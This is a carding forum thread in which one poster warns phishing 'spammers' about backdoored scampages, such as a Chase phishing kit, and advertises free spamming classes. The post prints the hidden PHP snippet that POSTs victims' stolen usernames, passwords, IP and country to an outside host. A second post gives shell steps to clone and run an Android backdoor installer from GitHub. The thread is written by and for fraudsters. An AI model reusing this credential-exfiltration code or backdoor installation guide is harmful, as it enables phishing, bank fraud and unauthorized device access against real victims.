Backdoors alert!

Carding 4 Carders

Professional
Messages
2,731
Reputation
13
Reaction score
1,376
Points
113
Please my advice to you guys is to be very careful with backdoors. Some people can't spam so all they do is to hide lazy scripts and rats in scampages. So whenever you spam. They also get results in their email. So all your hardwork is shit. When a particular scampage is shared among many spammers. The probability of backdoor is 99%. One person would hide a rat in a page and circulates. Especially if you're a noob. I just collected a page from a friend and he tried to backdoor me. By hiding source code to recieve results in his fucking email. You guys should be careful. Especially noobs!

Code:
$api = 'http://my-ips.org/ip/index.php'; //put api url
$country = visitor_country();
$ip = getenv("REMOTE_ADDR");

 $data = array(
  "user" => $user,
  "pass" => $pass,
  "type" => "1",
  "country" => $country,
  "ip" => $ip
 );
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $api);
 curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $result = curl_exec($ch);
 curl_close($ch);

•ALL YOU GUYS SPAMMING CHASE WITH XBALTI EDIT THE SOURCE CODE & DELETE THE BACKDOOR.

OR STOP USING THAT SCAMPAGE ANYONE CAN ACCESS YOUR RESULTS.

If you want to master your spamming skills, request for a class lesson.

Spamming class cost: free, comes with all necessary method and appropriate tools needed for work.
 

Carding 4 Carders

Professional
Messages
2,731
Reputation
13
Reaction score
1,376
Points
113
Installing BackDoor on Android

Backdoor is a malicious program, and sometimes an intentionally left loophole in the code of a legitimate program that provides access to a device for unauthorized actions.

Installation:
Code:
▪️apt update && apt upgrade
▪️apt install git && apt install python2
▪️git clone https://github.com/PyRAT-svg/msfgaf.git
▪️cd msfgaf

Using:
Code:
▪️python2 install.py
Next, where "Next" comes out, press Enter, and where y / n press y.
 
Top